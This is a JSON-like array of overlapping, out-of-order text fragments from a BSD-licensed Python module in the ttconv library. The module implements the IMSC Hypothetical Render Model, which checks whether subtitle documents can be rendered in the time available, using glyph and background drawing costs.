"if not (stats.is_empty and is_last_isd_empty): last_offset = time_offset is_last_isd_empty = stats.is_empty @dataclass(frozen=True) class",
"element.parent().get_style(styles.StyleProperties.FontSize) if font_size.units is not styles.LengthType.Units.rh: raise RuntimeError(f\"Unsupported fontSize units: {font_size.units}\") return font_size.value",
"ord(char) in GCPY_12 else _GCPY_OTHER def _region_normalized_size(region: typing.Type[ttconv.isd.ISD.Region]): region_extent: styles.ExtentType = region.get_style(styles.StyleProperties.Extent) if",
"# list of conditions and the following disclaimer. # 2. Redistributions in binary",
"logging import ttconv.isd import ttconv.style_properties as styles import ttconv.model from ._gcpy_codepoints import GCPY_12",
"a callee to inform the caller of events that occur during processing. Typically",
"ISDStatistics): LOGGER.debug(EventHandler._format_message(msg, doc_index, time_offset, available_time, stats)) def validate(isd_iterator: typing.Iterator[typing.Tuple[Fraction, ttconv.isd.ISD]], event_handler: typing.Type[EventHandler]=EventHandler()): '''Determines",
"= ISDStatistics() self._compute_dur_t(isd, index_n) self._compute_dur_d(isd, index_n, is_last_isd_empty) self.isd_stats.dur = self.isd_stats.dur_t + self.isd_stats.dur_d return",
"the distribution. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND",
"if region.get_style(styles.StyleProperties.Visibility) is styles.DisplayType.none: return False if region.has_children(): return True if region.get_style(styles.StyleProperties.ShowBackground) is",
"Fraction, available_time: Fraction, stats: ISDStatistics): LOGGER.info(EventHandler._format_message(msg, doc_index, time_offset, available_time, stats)) def warn(self, msg:",
"number of glyphs rendered is_empty: bool = False # Does the ISD contain",
"def _compute_gcpy(char: str): if len(char) != 1: raise ValueError(\"Argument must be a string",
"count: {stats.gren_count} | Background draw count: {stats.nbg_total} | Clear: {stats.clear}\\n\" ) def info(self,",
"that the following conditions are met: # # 1. Redistributions of source code",
"HRM background drawing time nbg_total: Number = 0 # Number of backgrounds drawn",
"GCPY_12 else _GCPY_OTHER def _region_normalized_size(region: typing.Type[ttconv.isd.ISD.Region]): region_extent: styles.ExtentType = region.get_style(styles.StyleProperties.Extent) if region_extent.width.units is",
"def _is_presented_region(region: typing.Type[ttconv.isd.ISD.Region]): '''See https://www.w3.org/TR/ttml-imsc1.1/#dfn-presented-region ''' if region.get_style(styles.StyleProperties.Opacity) == 0: return False if",
"0 # HRM text drawing time ngra_t: Number = 0 # Total Normalized",
"through callbacks on the `event_handler`. ''' hrm = HRM() last_offset = 0 is_last_isd_empty",
"doc_index == 0 else time_offset - last_offset if stats.dur > avail_render_time: event_handler.error(\"Rendering time",
"for region in isd.iter_regions(): if not _is_presented_region(region): continue for element in region.dfs_iterator(): if",
"True for doc_index, (time_offset, isd) in enumerate(isd_iterator): if time_offset < last_offset: raise RuntimeError(\"ISDs",
"= stats.is_empty @dataclass(frozen=True) class _Glyph: char: str color : styles.ColorType font_family: typing.Tuple[typing.Union[str, styles.GenericFontFamilyType]]",
"`isd_iterator` conform to the IMSC HRM. `isd_iterator` returns a sequence of tuplets `(begin,",
"for element in region.dfs_iterator(): if not isinstance(element, ttconv.model.Text): continue parent = element.parent() nrga",
"the following conditions are met: # # 1. Redistributions of source code must",
"# Does the ISD contain any content class EventHandler: '''Allows a callee to",
"index_n: int, is_last_isd_empty: bool ) -> ISDStatistics: self.isd_stats = ISDStatistics() self._compute_dur_t(isd, index_n) self._compute_dur_d(isd,",
"OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF",
"whether the sequence of ISDs returned by `isd_iterator` conform to the IMSC HRM.",
"DAMAGE. '''Hypothetical Render Model (HRM)''' __author__ = \"<NAME> <<EMAIL>>\" import typing from dataclasses",
"is not None: if bg_color.ident is not styles.ColorType.Colorimetry.RGBA8: raise RuntimeError(f\"Unsupported colorimetry system: {bg_color.ident}\")",
"draw_area = 0 if index_n == 0 or is_last_isd_empty else 1 self.isd_stats.clear =",
"Whether the root container had to be cleared dur_t: Number = 0 #",
"ends immediately before the `begin` value of the next ISD. Errors, warnings and",
"doc_index, time_offset, available_time, stats)) def warn(self, msg: str, doc_index: int, time_offset: Fraction, available_time:",
"avail_render_time, stats) if stats.ngra_t > 1: event_handler.error(\"NGBS exceeded\", doc_index, time_offset, avail_render_time, stats) event_handler.debug(\"Processed",
"overridden by the caller. ''' @staticmethod def _format_message(msg: str, doc_index: int, time_offset: Fraction,",
"IN ANY WAY OUT OF THE USE OF THIS # SOFTWARE, EVEN IF",
"logging.getLogger(__name__) _BDRAW = 12 _GCPY_BASE = 12 _GCPY_OTHER = 3 _REN_G_CJK = 0.6",
"SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND #",
"bg_color = element.get_style(styles.StyleProperties.BackgroundColor) if bg_color is not None: if bg_color.ident is not styles.ColorType.Colorimetry.RGBA8:",
"None: if bg_color.ident is not styles.ColorType.Colorimetry.RGBA8: raise RuntimeError(f\"Unsupported colorimetry system: {bg_color.ident}\") if bg_color.components[3]",
"isd: typing.Type[ttconv.isd.ISD], _index_n: int ): front_buffer = set() if isd is not None:",
"ttconv.isd import ttconv.style_properties as styles import ttconv.model from ._gcpy_codepoints import GCPY_12 LOGGER =",
"def _compute_dur_d( self, isd: typing.Type[ttconv.isd.ISD], index_n: int, is_last_isd_empty: bool ): self.isd_stats.is_empty = True",
"in isd.iter_regions(): if not _is_presented_region(region): continue for element in region.dfs_iterator(): if not isinstance(element,",
"/ _compute_gcpy(char) self.isd_stats.gcpy_count += 1 elif glyph in self.back_buffer: self.isd_stats.dur_t += nrga /",
"1\") return _REN_G_CJK if 0x4E00 <= ord(char) <= 0x9FFF else _REN_G_OTHER def _compute_gcpy(char:",
"font_size=parent.get_style(styles.StyleProperties.FontSize), font_style=parent.get_style(styles.StyleProperties.FontStyle), font_weight=parent.get_style(styles.StyleProperties.FontWeight), text_decoration=parent.get_style(styles.StyleProperties.TextDecoration), text_outline=parent.get_style(styles.StyleProperties.TextOutline), text_shadow=parent.get_style(styles.StyleProperties.TextShadow), background_color=parent.get_style(styles.StyleProperties.BackgroundColor) ) if glyph in front_buffer: self.isd_stats.dur_t",
"<= ord(char) <= 0x9FFF else _REN_G_OTHER def _compute_gcpy(char: str): if len(char) != 1:",
"raise RuntimeError(f\"Unsupported extent height units: {region_extent.height.units}\") return region_extent.width.value * region_extent.height.value / 10000 def",
"font_size: styles.LengthType = element.parent().get_style(styles.StyleProperties.FontSize) if font_size.units is not styles.LengthType.Units.rh: raise RuntimeError(f\"Unsupported fontSize units:",
"SERVICES; # LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED",
"HRM: def __init__(self): self.back_buffer: typing.Set[_Glyph] = set() self.isd_stats: ISDStatistics = None def next_isd(",
"WAY OUT OF THE USE OF THIS # SOFTWARE, EVEN IF ADVISED OF",
"cleared dur_t: Number = 0 # HRM text drawing time ngra_t: Number =",
"time_offset: Fraction, available_time: Fraction, stats: ISDStatistics): LOGGER.info(EventHandler._format_message(msg, doc_index, time_offset, available_time, stats)) def warn(self,",
"Redistributions in binary form must reproduce the above copyright notice, # this list",
"font_size: styles.LengthType font_style: styles.FontStyleType font_weight: styles.FontWeightType text_decoration: styles.TextDecorationType text_outline: styles.TextOutlineType text_shadow: styles.TextShadowType background_color:",
"ISD contain any content class EventHandler: '''Allows a callee to inform the caller",
"units: {region_extent.width.units}\") if region_extent.height.units is not styles.LengthType.Units.rh: raise RuntimeError(f\"Unsupported extent height units: {region_extent.height.units}\")",
"import ttconv.style_properties as styles import ttconv.model from ._gcpy_codepoints import GCPY_12 LOGGER = logging.getLogger(__name__)",
"to be cleared dur_t: Number = 0 # HRM text drawing time ngra_t:",
"HRM time: {float(stats.dur):.3f}\\n\" f\" Glyph copy count: {stats.gcpy_count} | render count: {stats.gren_count} |",
"THE POSSIBILITY OF SUCH DAMAGE. '''Hypothetical Render Model (HRM)''' __author__ = \"<NAME> <<EMAIL>>\"",
"Total Normalized Rendered Glyph Area gcpy_count: Number = 0 # Total number of",
"SUBSTITUTE GOODS OR SERVICES; # LOSS OF USE, DATA, OR PROFITS; OR BUSINESS",
"> avail_render_time: event_handler.error(\"Rendering time exceeded\", doc_index, time_offset, avail_render_time, stats) if stats.ngra_t > 1:",
"* region_extent.height.value / 10000 def _is_presented_region(region: typing.Type[ttconv.isd.ISD.Region]): '''See https://www.w3.org/TR/ttml-imsc1.1/#dfn-presented-region ''' if region.get_style(styles.StyleProperties.Opacity) ==",
"# should transparent backgrounds really be counted? -> NO # should span and",
"_compute_gcpy(char) self.isd_stats.ngra_t += nrga self.isd_stats.gcpy_count += 1 else: self.isd_stats.dur_t += nrga / _compute_ren_g(char)",
"messages are signalled through callbacks on the `event_handler`. ''' hrm = HRM() last_offset",
"bool ): self.isd_stats.is_empty = True draw_area = 0 if index_n == 0 or",
"at `begin` seconds and ends immediately before the `begin` value of the next",
"2021, Pearl TV LLC # # Redistribution and use in source and binary",
"should br really be included -> no if isinstance(element, ttconv.model.Br): continue bg_color =",
"None: for region in isd.iter_regions(): if not _is_presented_region(region): continue for element in region.dfs_iterator():",
"available_time, stats)) def error(self, msg: str, doc_index: int, time_offset: Fraction, available_time: Fraction, stats:",
"# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"",
"of source code must retain the above copyright notice, this # list of",
"COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR # ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,",
"no if isinstance(element, ttconv.model.Br): continue bg_color = element.get_style(styles.StyleProperties.BackgroundColor) if bg_color is not None:",
"warn(self, msg: str, doc_index: int, time_offset: Fraction, available_time: Fraction, stats: ISDStatistics): LOGGER.warning(EventHandler._format_message(msg, doc_index,",
"Number import logging import ttconv.isd import ttconv.style_properties as styles import ttconv.model from ._gcpy_codepoints",
"LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND #",
"region.has_children(): return True if region.get_style(styles.StyleProperties.ShowBackground) is not styles.ShowBackgroundType.always: return False bg_color: styles.ColorType =",
"def _compute_nrga(element: typing.Type[ttconv.model.Text]): font_size: styles.LengthType = element.parent().get_style(styles.StyleProperties.FontSize) if font_size.units is not styles.LengthType.Units.rh: raise",
"= element.get_style(styles.StyleProperties.BackgroundColor) if bg_color is not None: if bg_color.ident is not styles.ColorType.Colorimetry.RGBA8: raise",
"stats: ISDStatistics): LOGGER.warning(EventHandler._format_message(msg, doc_index, time_offset, available_time, stats)) def error(self, msg: str, doc_index: int,",
"TV LLC # # Redistribution and use in source and binary forms, with",
"return False if region.get_style(styles.StyleProperties.Visibility) is styles.DisplayType.none: return False if region.has_children(): return True if",
"notice, # this list of conditions and the following disclaimer in the documentation",
"Number = 0 # Number of backgrounds drawn clear: bool = False #",
"https://www.w3.org/TR/ttml-imsc1.1/#dfn-presented-region ''' if region.get_style(styles.StyleProperties.Opacity) == 0: return False if region.get_style(styles.StyleProperties.Display) is styles.DisplayType.none: return",
"styles.DisplayType.none: return False if region.get_style(styles.StyleProperties.Visibility) is styles.DisplayType.none: return False if region.has_children(): return True",
"time_offset: Fraction, available_time: Fraction, stats: ISDStatistics): return ( f\"{msg} at {float(time_offset):.3f}s (doc #{doc_index})\\n\"",
"typing from dataclasses import dataclass from fractions import Fraction from numbers import Number",
"'''Allows a callee to inform the caller of events that occur during processing.",
"the next ISD. Errors, warnings and info messages are signalled through callbacks on",
"other materials provided with the distribution. # # THIS SOFTWARE IS PROVIDED BY",
"MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE # DISCLAIMED. IN NO EVENT",
"_compute_ren_g(char: str): if len(char) != 1: raise ValueError(\"Argument must be a string of",
"char=char, color=parent.get_style(styles.StyleProperties.Color), font_family=parent.get_style(styles.StyleProperties.FontFamily), font_size=parent.get_style(styles.StyleProperties.FontSize), font_style=parent.get_style(styles.StyleProperties.FontStyle), font_weight=parent.get_style(styles.StyleProperties.FontWeight), text_decoration=parent.get_style(styles.StyleProperties.TextDecoration), text_outline=parent.get_style(styles.StyleProperties.TextOutline), text_shadow=parent.get_style(styles.StyleProperties.TextShadow), background_color=parent.get_style(styles.StyleProperties.BackgroundColor) ) if glyph",
"styles.LengthType font_style: styles.FontStyleType font_weight: styles.FontWeightType text_decoration: styles.TextDecorationType text_outline: styles.TextOutlineType text_shadow: styles.TextShadowType background_color: styles.ColorType",
"int, time_offset: Fraction, available_time: Fraction, stats: ISDStatistics): LOGGER.debug(EventHandler._format_message(msg, doc_index, time_offset, available_time, stats)) def",
"nrga / _compute_ren_g(char) self.isd_stats.ngra_t += nrga self.isd_stats.gren_count += 1 front_buffer.add(glyph) self.back_buffer = front_buffer",
"return False if region.get_style(styles.StyleProperties.Display) is styles.DisplayType.none: return False if region.get_style(styles.StyleProperties.Visibility) is styles.DisplayType.none: return",
"ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES # (INCLUDING, BUT NOT",
"_compute_nrga(element) for char in element.get_text(): glyph = _Glyph( char=char, color=parent.get_style(styles.StyleProperties.Color), font_family=parent.get_style(styles.StyleProperties.FontFamily), font_size=parent.get_style(styles.StyleProperties.FontSize), font_style=parent.get_style(styles.StyleProperties.FontStyle),",
"_region_normalized_size(region: typing.Type[ttconv.isd.ISD.Region]): region_extent: styles.ExtentType = region.get_style(styles.StyleProperties.Extent) if region_extent.width.units is not styles.LengthType.Units.rw: raise RuntimeError(f\"Unsupported",
"0 if isd is not None: for region in isd.iter_regions(): if not _is_presented_region(region):",
"nbg self.isd_stats.dur_d = draw_area / _BDRAW def _compute_dur_t( self, isd: typing.Type[ttconv.isd.ISD], _index_n: int",
"region.get_style(styles.StyleProperties.Extent) if region_extent.width.units is not styles.LengthType.Units.rw: raise RuntimeError(f\"Unsupported extent width units: {region_extent.width.units}\") if",
"OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND # ON ANY THEORY OF",
"be excluded? -> NO # should transparent backgrounds really be counted? -> NO",
"text_outline=parent.get_style(styles.StyleProperties.TextOutline), text_shadow=parent.get_style(styles.StyleProperties.TextShadow), background_color=parent.get_style(styles.StyleProperties.BackgroundColor) ) if glyph in front_buffer: self.isd_stats.dur_t += nrga / _compute_gcpy(char)",
"stats: ISDStatistics): LOGGER.error(EventHandler._format_message(msg, doc_index, time_offset, available_time, stats)) def debug(self, msg: str, doc_index: int,",
"ISD)`, where `ISD` is an ISD instance whose active interval starts at `begin`",
"font_size.units is not styles.LengthType.Units.rh: raise RuntimeError(f\"Unsupported fontSize units: {font_size.units}\") return font_size.value * font_size.value",
"raise RuntimeError(f\"Unsupported extent width units: {region_extent.width.units}\") if region_extent.height.units is not styles.LengthType.Units.rh: raise RuntimeError(f\"Unsupported",
"INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES # (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT",
"glyphs rendered is_empty: bool = False # Does the ISD contain any content",
"# Redistribution and use in source and binary forms, with or without #",
"seconds and ends immediately before the `begin` value of the next ISD. Errors,",
"EventHandler: '''Allows a callee to inform the caller of events that occur during",
"= 0 # Total number of glyphs copied gren_count: Number = 0 #",
"in enumerate(isd_iterator): if time_offset < last_offset: raise RuntimeError(\"ISDs are not in order of",
"0 or is_last_isd_empty else 1 self.isd_stats.clear = draw_area != 0 if isd is",
"Total number of glyphs rendered is_empty: bool = False # Does the ISD",
"be included -> yes for now # should br really be included ->",
"{stats.clear}\\n\" ) def info(self, msg: str, doc_index: int, time_offset: Fraction, available_time: Fraction, stats:",
"False if region.get_style(styles.StyleProperties.Display) is styles.DisplayType.none: return False if region.get_style(styles.StyleProperties.Visibility) is styles.DisplayType.none: return False",
"self.isd_stats.dur_t += nrga / _compute_gcpy(char) self.isd_stats.gcpy_count += 1 elif glyph in self.back_buffer: self.isd_stats.dur_t",
"should body elements really be excluded? -> NO # should transparent backgrounds really",
"-> no if isinstance(element, ttconv.model.Br): continue bg_color = element.get_style(styles.StyleProperties.BackgroundColor) if bg_color is not",
"- last_offset if stats.dur > avail_render_time: event_handler.error(\"Rendering time exceeded\", doc_index, time_offset, avail_render_time, stats)",
"_compute_gcpy(char: str): if len(char) != 1: raise ValueError(\"Argument must be a string of",
"source code must retain the above copyright notice, this # list of conditions",
"time_offset, avail_render_time, stats) event_handler.debug(\"Processed document\", doc_index, time_offset, avail_render_time, stats) if not (stats.is_empty and",
"if region.has_children(): return True if region.get_style(styles.StyleProperties.ShowBackground) is not styles.ShowBackgroundType.always: return False bg_color: styles.ColorType",
"retain the above copyright notice, this # list of conditions and the following",
"= logging.getLogger(__name__) _BDRAW = 12 _GCPY_BASE = 12 _GCPY_OTHER = 3 _REN_G_CJK =",
"self.isd_stats.dur_t += nrga / _compute_ren_g(char) self.isd_stats.ngra_t += nrga self.isd_stats.gren_count += 1 front_buffer.add(glyph) self.back_buffer",
"False # Whether the root container had to be cleared dur_t: Number =",
"return font_size.value * font_size.value / 10000 def _compute_ren_g(char: str): if len(char) != 1:",
"are permitted provided that the following conditions are met: # # 1. Redistributions",
"NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS",
"ISD instance whose active interval starts at `begin` seconds and ends immediately before",
"if bg_color.components[3] != 0: nbg += 1 draw_area += _region_normalized_size(region) * nbg self.isd_stats.nbg_total",
"font_size.value * font_size.value / 10000 def _compute_ren_g(char: str): if len(char) != 1: raise",
"length 1\") return _REN_G_CJK if 0x4E00 <= ord(char) <= 0x9FFF else _REN_G_OTHER def",
"is not styles.LengthType.Units.rw: raise RuntimeError(f\"Unsupported extent width units: {region_extent.width.units}\") if region_extent.height.units is not",
"-*- # Copyright (c) 2021, Pearl TV LLC # # Redistribution and use",
"stats.dur > avail_render_time: event_handler.error(\"Rendering time exceeded\", doc_index, time_offset, avail_render_time, stats) if stats.ngra_t >",
"continue parent = element.parent() nrga = _compute_nrga(element) for char in element.get_text(): glyph =",
"= 0 # Total Normalized Rendered Glyph Area gcpy_count: Number = 0 #",
"USE OF THIS # SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH",
"if len(char) != 1: raise ValueError(\"Argument must be a string of length 1\")",
"font_style: styles.FontStyleType font_weight: styles.FontWeightType text_decoration: styles.TextDecorationType text_outline: styles.TextOutlineType text_shadow: styles.TextShadowType background_color: styles.ColorType class",
"elements really be excluded? -> NO # should transparent backgrounds really be counted?",
"region_extent.height.value / 10000 def _is_presented_region(region: typing.Type[ttconv.isd.ISD.Region]): '''See https://www.w3.org/TR/ttml-imsc1.1/#dfn-presented-region ''' if region.get_style(styles.StyleProperties.Opacity) == 0:",
"draw_area += _region_normalized_size(region) * nbg self.isd_stats.nbg_total += nbg self.isd_stats.dur_d = draw_area / _BDRAW",
"doc_index, time_offset, available_time, stats)) def error(self, msg: str, doc_index: int, time_offset: Fraction, available_time:",
"TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE",
"ISDs returned by `isd_iterator` conform to the IMSC HRM. `isd_iterator` returns a sequence",
"self.isd_stats.dur_t + self.isd_stats.dur_d return self.isd_stats def _compute_dur_d( self, isd: typing.Type[ttconv.isd.ISD], index_n: int, is_last_isd_empty:",
"NO # should transparent backgrounds really be counted? -> NO # should span",
"binary forms, with or without # modification, are permitted provided that the following",
"True draw_area = 0 if index_n == 0 or is_last_isd_empty else 1 self.isd_stats.clear",
"self.isd_stats.ngra_t += nrga self.isd_stats.gcpy_count += 1 else: self.isd_stats.dur_t += nrga / _compute_ren_g(char) self.isd_stats.ngra_t",
"nrga self.isd_stats.gren_count += 1 front_buffer.add(glyph) self.back_buffer = front_buffer def _compute_nrga(element: typing.Type[ttconv.model.Text]): font_size: styles.LengthType",
"Errors, warnings and info messages are signalled through callbacks on the `event_handler`. '''",
"2. Redistributions in binary form must reproduce the above copyright notice, # this",
"{float(time_offset):.3f}s (doc #{doc_index})\\n\" f\" available time: {float(available_time):.3f}s | HRM time: {float(stats.dur):.3f}\\n\" f\" Glyph",
"_REN_G_CJK = 0.6 _REN_G_OTHER = 1.2 _NGBS = 1 _IPD = 1 @dataclass",
"1.2 _NGBS = 1 _IPD = 1 @dataclass class ISDStatistics: dur: Number =",
"stats: ISDStatistics): LOGGER.info(EventHandler._format_message(msg, doc_index, time_offset, available_time, stats)) def warn(self, msg: str, doc_index: int,",
"ARISING IN ANY WAY OUT OF THE USE OF THIS # SOFTWARE, EVEN",
"ttconv.style_properties as styles import ttconv.model from ._gcpy_codepoints import GCPY_12 LOGGER = logging.getLogger(__name__) _BDRAW",
"DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR",
") if glyph in front_buffer: self.isd_stats.dur_t += nrga / _compute_gcpy(char) self.isd_stats.gcpy_count += 1",
"0x9FFF else _REN_G_OTHER def _compute_gcpy(char: str): if len(char) != 1: raise ValueError(\"Argument must",
"int ): front_buffer = set() if isd is not None: for region in",
"RuntimeError(f\"Unsupported extent height units: {region_extent.height.units}\") return region_extent.width.value * region_extent.height.value / 10000 def _is_presented_region(region:",
"_compute_nrga(element: typing.Type[ttconv.model.Text]): font_size: styles.LengthType = element.parent().get_style(styles.StyleProperties.FontSize) if font_size.units is not styles.LengthType.Units.rh: raise RuntimeError(f\"Unsupported",
"the root container had to be cleared dur_t: Number = 0 # HRM",
"NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR # ANY",
"should span and br really be included -> yes for now # should",
"distribution. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS",
"IMSC HRM. `isd_iterator` returns a sequence of tuplets `(begin, ISD)`, where `ISD` is",
"for element in region.dfs_iterator(): # should body elements really be excluded? -> NO",
"fractions import Fraction from numbers import Number import logging import ttconv.isd import ttconv.style_properties",
"last_offset: raise RuntimeError(\"ISDs are not in order of increasing offset\") stats = hrm.next_isd(isd,",
"): self.isd_stats.is_empty = True draw_area = 0 if index_n == 0 or is_last_isd_empty",
"# # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS",
"IS\" AND # ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,",
"NO # should span and br really be included -> yes for now",
"ttconv.model.Text): continue parent = element.parent() nrga = _compute_nrga(element) for char in element.get_text(): glyph",
"backgrounds really be counted? -> NO # should span and br really be",
"# Number of backgrounds drawn clear: bool = False # Whether the root",
"binary form must reproduce the above copyright notice, # this list of conditions",
"= _compute_nrga(element) for char in element.get_text(): glyph = _Glyph( char=char, color=parent.get_style(styles.StyleProperties.Color), font_family=parent.get_style(styles.StyleProperties.FontFamily), font_size=parent.get_style(styles.StyleProperties.FontSize),",
"Fraction from numbers import Number import logging import ttconv.isd import ttconv.style_properties as styles",
"0.6 _REN_G_OTHER = 1.2 _NGBS = 1 _IPD = 1 @dataclass class ISDStatistics:",
"= 0 # Number of backgrounds drawn clear: bool = False # Whether",
"font_family: typing.Tuple[typing.Union[str, styles.GenericFontFamilyType]] font_size: styles.LengthType font_style: styles.FontStyleType font_weight: styles.FontWeightType text_decoration: styles.TextDecorationType text_outline: styles.TextOutlineType",
"isd.iter_regions(): if not _is_presented_region(region): continue for element in region.dfs_iterator(): if not isinstance(element, ttconv.model.Text):",
"is_empty: bool = False # Does the ISD contain any content class EventHandler:",
"following disclaimer in the documentation # and/or other materials provided with the distribution.",
"text drawing time ngra_t: Number = 0 # Total Normalized Rendered Glyph Area",
"available_time: Fraction, stats: ISDStatistics): LOGGER.warning(EventHandler._format_message(msg, doc_index, time_offset, available_time, stats)) def error(self, msg: str,",
"conform to the IMSC HRM. `isd_iterator` returns a sequence of tuplets `(begin, ISD)`,",
"starts at `begin` seconds and ends immediately before the `begin` value of the",
"dataclasses import dataclass from fractions import Fraction from numbers import Number import logging",
"for doc_index, (time_offset, isd) in enumerate(isd_iterator): if time_offset < last_offset: raise RuntimeError(\"ISDs are",
"callbacks on the `event_handler`. ''' hrm = HRM() last_offset = 0 is_last_isd_empty =",
"1: event_handler.error(\"NGBS exceeded\", doc_index, time_offset, avail_render_time, stats) event_handler.debug(\"Processed document\", doc_index, time_offset, avail_render_time, stats)",
"None: for region in isd.iter_regions(): if not _is_presented_region(region): continue self.isd_stats.is_empty = False nbg",
"for now # should br really be included -> no if isinstance(element, ttconv.model.Br):",
"stats = hrm.next_isd(isd, doc_index, is_last_isd_empty) avail_render_time = _IPD if doc_index == 0 else",
"nrga / _compute_gcpy(char) self.isd_stats.gcpy_count += 1 elif glyph in self.back_buffer: self.isd_stats.dur_t += nrga",
"BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; # LOSS OF",
"form must reproduce the above copyright notice, # this list of conditions and",
"= 0 # HRM background drawing time nbg_total: Number = 0 # Number",
"any content class EventHandler: '''Allows a callee to inform the caller of events",
"continue for element in region.dfs_iterator(): if not isinstance(element, ttconv.model.Text): continue parent = element.parent()",
"of events that occur during processing. Typically overridden by the caller. ''' @staticmethod",
"Fraction, stats: ISDStatistics): LOGGER.error(EventHandler._format_message(msg, doc_index, time_offset, available_time, stats)) def debug(self, msg: str, doc_index:",
"= draw_area != 0 if isd is not None: for region in isd.iter_regions():",
"typing.Tuple[typing.Union[str, styles.GenericFontFamilyType]] font_size: styles.LengthType font_style: styles.FontStyleType font_weight: styles.FontWeightType text_decoration: styles.TextDecorationType text_outline: styles.TextOutlineType text_shadow:",
"LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT",
"isd) in enumerate(isd_iterator): if time_offset < last_offset: raise RuntimeError(\"ISDs are not in order",
"# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT",
"self.isd_stats.dur_d = draw_area / _BDRAW def _compute_dur_t( self, isd: typing.Type[ttconv.isd.ISD], _index_n: int ):",
"WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE # DISCLAIMED. IN",
"!= 0 if isd is not None: for region in isd.iter_regions(): if not",
"self.isd_stats.nbg_total += nbg self.isd_stats.dur_d = draw_area / _BDRAW def _compute_dur_t( self, isd: typing.Type[ttconv.isd.ISD],",
"IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND # ANY",
"{stats.gcpy_count} | render count: {stats.gren_count} | Background draw count: {stats.nbg_total} | Clear: {stats.clear}\\n\"",
"raise RuntimeError(\"ISDs are not in order of increasing offset\") stats = hrm.next_isd(isd, doc_index,",
"Number = 0 # HRM text drawing time ngra_t: Number = 0 #",
"IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR #",
"OR CONSEQUENTIAL DAMAGES # (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS",
"number of glyphs copied gren_count: Number = 0 # Total number of glyphs",
"ISDStatistics: dur: Number = 0 # HRM ISD time dur_d: Number = 0",
"if bg_color is not None: if bg_color.ident is not styles.ColorType.Colorimetry.RGBA8: raise RuntimeError(f\"Unsupported colorimetry",
"LOGGER.error(EventHandler._format_message(msg, doc_index, time_offset, available_time, stats)) def debug(self, msg: str, doc_index: int, time_offset: Fraction,",
"in GCPY_12 else _GCPY_OTHER def _region_normalized_size(region: typing.Type[ttconv.isd.ISD.Region]): region_extent: styles.ExtentType = region.get_style(styles.StyleProperties.Extent) if region_extent.width.units",
"from fractions import Fraction from numbers import Number import logging import ttconv.isd import",
"`isd_iterator` returns a sequence of tuplets `(begin, ISD)`, where `ISD` is an ISD",
"# modification, are permitted provided that the following conditions are met: # #",
"front_buffer: self.isd_stats.dur_t += nrga / _compute_gcpy(char) self.isd_stats.gcpy_count += 1 elif glyph in self.back_buffer:",
"1 else: self.isd_stats.dur_t += nrga / _compute_ren_g(char) self.isd_stats.ngra_t += nrga self.isd_stats.gren_count += 1",
"is_last_isd_empty: bool ) -> ISDStatistics: self.isd_stats = ISDStatistics() self._compute_dur_t(isd, index_n) self._compute_dur_d(isd, index_n, is_last_isd_empty)",
"available_time: Fraction, stats: ISDStatistics): LOGGER.error(EventHandler._format_message(msg, doc_index, time_offset, available_time, stats)) def debug(self, msg: str,",
"continue self.isd_stats.is_empty = False nbg = 0 for element in region.dfs_iterator(): # should",
"HRM. `isd_iterator` returns a sequence of tuplets `(begin, ISD)`, where `ISD` is an",
"of the next ISD. Errors, warnings and info messages are signalled through callbacks",
"font_style=parent.get_style(styles.StyleProperties.FontStyle), font_weight=parent.get_style(styles.StyleProperties.FontWeight), text_decoration=parent.get_style(styles.StyleProperties.TextDecoration), text_outline=parent.get_style(styles.StyleProperties.TextOutline), text_shadow=parent.get_style(styles.StyleProperties.TextShadow), background_color=parent.get_style(styles.StyleProperties.BackgroundColor) ) if glyph in front_buffer: self.isd_stats.dur_t +=",
"= 1 @dataclass class ISDStatistics: dur: Number = 0 # HRM ISD time",
"LOGGER.debug(EventHandler._format_message(msg, doc_index, time_offset, available_time, stats)) def validate(isd_iterator: typing.Iterator[typing.Tuple[Fraction, ttconv.isd.ISD]], event_handler: typing.Type[EventHandler]=EventHandler()): '''Determines whether",
"msg: str, doc_index: int, time_offset: Fraction, available_time: Fraction, stats: ISDStatistics): LOGGER.warning(EventHandler._format_message(msg, doc_index, time_offset,",
"last_offset if stats.dur > avail_render_time: event_handler.error(\"Rendering time exceeded\", doc_index, time_offset, avail_render_time, stats) if"
] |
[
